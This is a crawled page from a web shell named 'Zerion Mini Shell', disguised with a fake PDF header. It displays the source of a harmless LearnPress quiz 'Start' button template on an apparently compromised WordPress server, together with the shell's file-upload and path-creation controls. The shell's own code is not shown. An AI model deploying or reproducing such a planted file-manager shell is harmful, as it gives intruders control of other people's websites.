%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/ceaa/wp-content/plugins/learnpress/templates/content-quiz/buttons/
Upload File :
Create Path :
Current File : /var/www/html/ceaa/wp-content/plugins/learnpress/templates/content-quiz/buttons/start.php

<?php
/**
 * Template for displaying Start quiz button.
 *
 * This template can be overridden by copying it to yourtheme/learnpress/content-quiz/buttons/start.php.
 *
 * @author  ThimPress
 * @package  Learnpress/Templates
 * @version  3.0.0
 */

/**
 * Prevent loading this file directly
 */
defined( 'ABSPATH' ) || exit();

$course = LP_Global::course();
$quiz   = LP_Global::course_item_quiz();
?>

<?php do_action( 'learn-press/before-quiz-start-button' ); ?>

    <form name="start-quiz" class="start-quiz" method="post" enctype="multipart/form-data">

		<?php do_action( 'learn-press/begin-quiz-start-button' ); ?>

        <button type="submit" class="button"><?php _e( 'Start', 'learnpress' ); ?></button>

		<?php do_action( 'learn-press/end-quiz-start-button' ); ?>

		<?php LP_Nonce_Helper::quiz_action( 'start', $quiz->get_id(), $course->get_id(), true ); ?>
        <input type="hidden" name="noajax" value="yes">

    </form>

<?php do_action( 'learn-press/after-quiz-start-button' ); ?>

Zerion Mini Shell 1.0